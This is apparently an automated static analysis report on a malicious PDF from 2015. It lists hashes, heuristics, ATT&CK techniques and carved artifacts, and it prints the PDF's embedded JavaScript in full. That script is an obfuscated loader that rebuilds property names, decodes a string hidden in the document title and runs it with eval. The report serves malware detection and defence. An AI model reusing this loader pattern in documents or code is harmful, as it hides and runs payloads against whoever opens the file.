Malicious PDF — malware analysis report

Static analysis result for SHA-256 b32e0e70f8b88b3e…

MALICIOUS

PDF

48.8 KB First seen: 2015-09-22
MD5: 60aa0d3de8edd6f3ab8fb926ee271708 SHA-1: d6ff268e2c998c6e732256ce939ee175d68268ad SHA-256: b32e0e70f8b88b3e5765aade2aa4876cfdbafbb58b378138be032e952c863793
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The PDF file contains embedded JavaScript and utilizes ASCIIHexDecode filters, indicating an attempt to obfuscate malicious content. The presence of PDF_JAVASCRIPT and PDF_JS heuristics strongly suggests that the embedded JavaScript is intended to be executed. This script likely serves as a downloader for additional malicious components, contributing to a multi-stage attack. The exact payload and ultimate goal are not discernible from the provided static analysis alone.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 5

  • ASCIIHexDecode filter (with exploit indicators) medium PDF_FILTER_HEX
    Hex-encoding filter present alongside exploit delivery indicators — often used to hide payload or shellcode bytes
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x9413 822 bytes
SHA-256: da3a6e3799280e66ee0c40103df2585acead7cde34ad61647884978c867cbfeb
Preview script
First 1,000 lines of the extracted script
nmmjkywrdnemqvkiyq = this['ydedmeopmidsiwbvvoiydedmeopmidsiwbvvonydedmeopmidsiwbvvofydedmeopmidsiwbvvooydedmeopmidsiwbvvo'.replace(/ydedmeopmidsiwbvvo/g,'')]['ydedmeopmidsiwbvvotydedmeopmidsiwbvvoiydedmeopmidsiwbvvotydedmeopmidsiwbvvolydedmeopmidsiwbvvoeydedmeopmidsiwbvvo'.replace(/ydedmeopmidsiwbvvo/g,'')];
		vvevsoheutxdhpqtya = '';
		for (vxsdfvworxjmlgltjn = 0; vxsdfvworxjmlgltjn < nmmjkywrdnemqvkiyq.length; vxsdfvworxjmlgltjn += 2) {
			vvevsoheutxdhpqtya += nmmjkywrdnemqvkiyq['cydedmeopmidsiwbvvohydedmeopmidsiwbvvoaydedmeopmidsiwbvvorydedmeopmidsiwbvvoAydedmeopmidsiwbvvot'.replace(/ydedmeopmidsiwbvvo/g,'')](vxsdfvworxjmlgltjn);
		}
		this['ydedmeopmidsiwbvvoeydedmeopmidsiwbvvovydedmeopmidsiwbvvoaydedmeopmidsiwbvvolydedmeopmidsiwbvvo'.replace(/ydedmeopmidsiwbvvo/g,'')](vvevsoheutxdhpqtya);
stream_002_off0000966a.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x966A 449 bytes
SHA-256: 070732b3fbbd20295c5b1a911789c30af5b99ce5e14e004bbedc5acf7f113122
font_00_sfnt_off00000349.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x349 58553 bytes
SHA-256: 4e56128afad897c8ba22338709048333a61f0c1c8de4785f90267c2edf4d9a4e

Open this report in the interactive analyzer, or submit your own file for analysis.